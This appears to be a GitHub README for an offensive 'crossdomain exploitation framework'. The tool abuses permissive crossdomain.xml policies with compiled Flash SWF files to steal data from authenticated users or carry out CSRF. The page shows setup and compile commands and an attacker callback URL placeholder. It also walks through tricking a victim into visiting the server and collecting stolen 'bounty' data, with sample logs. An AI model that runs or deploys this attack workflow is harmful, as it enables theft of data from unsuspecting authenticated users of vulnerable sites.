Skip to content
Switch branches/tags

Latest commit


Git stats


Failed to load latest commit information.
Latest commit message
Commit time


While not much of a framework just yet, everything you need to exploit overly permissive crossdomain.xml files is here.

Supported OS



Download and Setup

root@kali:~# git clone
root@kali:~# cd crossdomain-exploitation-framework
root@kali:~/crossdomain-exploitation-framework# ./SWF-server

Sample Output - Installation

root@kali:~/crossdomain-exploitation-framework# python SWF-server

*                                                *
*              Welcome to SWF Server!            *
*                                                *

It looks like this is the first run.  We need to set up a few things...

[INSTALL] Creating /opt/flex...
[INSTALL] Downloading Flex (This is a 340MB file)...
[INSTALL] Downloading: Bytes: 343973963
[INSTALL] Extracting Flex to /opt/flex (Takes 5-20 seconds)...
[INSTALL] Creating a self-signed SSL cert...
[INSTALL] Copying http-crossdomain.nse to nmap scripts directory...
[INSTALL] Time to create your own SWF file

     To create your own SWF file:

     1) Chose a template from ./actionscript-templates
     2) Edit the template (or copy and then edit the template)
         a) Specify a page on the vulnerable site that you want your victimn to access:
         b) For data stealing SWFs, specify your attacker callback URL:
              Ex: http://attacker/,, or
         c) For CSRF SWFs, modify the actionscript to extract the information you need
     3) Compile the ActionScript file and drop the SWF to the ./webroot directory (exploit.swf)
         a) /opt/flex/bin/mxmlc ./actionscript-templates/<template>.as --output ./webroot/exploit.swf

     4) Re-run ./SWF-server


Sample Output - SWF creation

root@kali:~/crossdomain-exploitation-framework# ls -l actionscript-templates/
total 24
-rw-r--r-- 1 501 staff 1952 Sep 28 17:53
-rw-r--r-- 1 501 staff 3247 Sep 28 17:53
-rw-r--r-- 1 501 staff 2408 Sep 28 17:53
-rw-r--r-- 1 501 staff 2734 Sep 28 17:53
-rw-r--r-- 1 501 staff  985 Oct 10 16:08
-rw-r--r-- 1 501 staff 1317 Oct 10 16:10
root@kali:~/crossdomain-exploitation-framework/# vi actionscript-templates/ 
root@kali:~/crossdomain-exploitation-framework/# /opt/flex/bin/mxmlc actionscript-templates/ --output /root/crossdomain-exploitation-framework/webroot/exploit.swf
Loading configuration file /opt/flex/frameworks/flex-config.xml
/root/crossdomain-exploitation-framework/actionscript-templates/ Warning: This compilation unit did not have a factoryClass specified in Frame metadata to load the configured runtime shared libraries. To compile without runtime shared libraries either set the -static-link-runtime-shared-libraries option to true or remove the -runtime-shared-libraries option.

/root/crossdomain-exploitation-framework/webroot/exploit.swf (1085 bytes)

Sample Output - Execution

Once you have compiled your SWF and saved it in the web root, you should run SWF-server:

root@kali:~/crossdomain-exploitation-framework# ./SWF-server 

*                                                *
*              Welcome to SWF Server!            *
*                                                *

      [SWF-Server] Listening on 443/tcp
      [SWF-Server] Document Root: /root/crossdomain-exploitation-framework/webroot
      [SWF-Server] Version:       0.9.3
      [SWF-Server] Use <Ctrl-C> to stop

 Step #1) Hope that your victim is authenticated with the vulnerable site
 Step #2) Convince your victim to arrive at https://<this-server>/index.html
 Step #3) Collect your bounty at ./bounty/ - - [13/Oct/2014 15:39:41] "GET /index.html HTTP/1.1" 200 - - - [13/Oct/2014 15:39:41] "GET /exploit.swf HTTP/1.1" 200 -

*  New bounty file written to disk: 
*  /root/crossdomain-exploitation-framework/bounty/bounty- - - [13/Oct/2014 15:39:43] "POST / HTTP/1.1" 200 -


Everything you need to exploit overly permissive crossdomain.xml files



No releases published


No packages published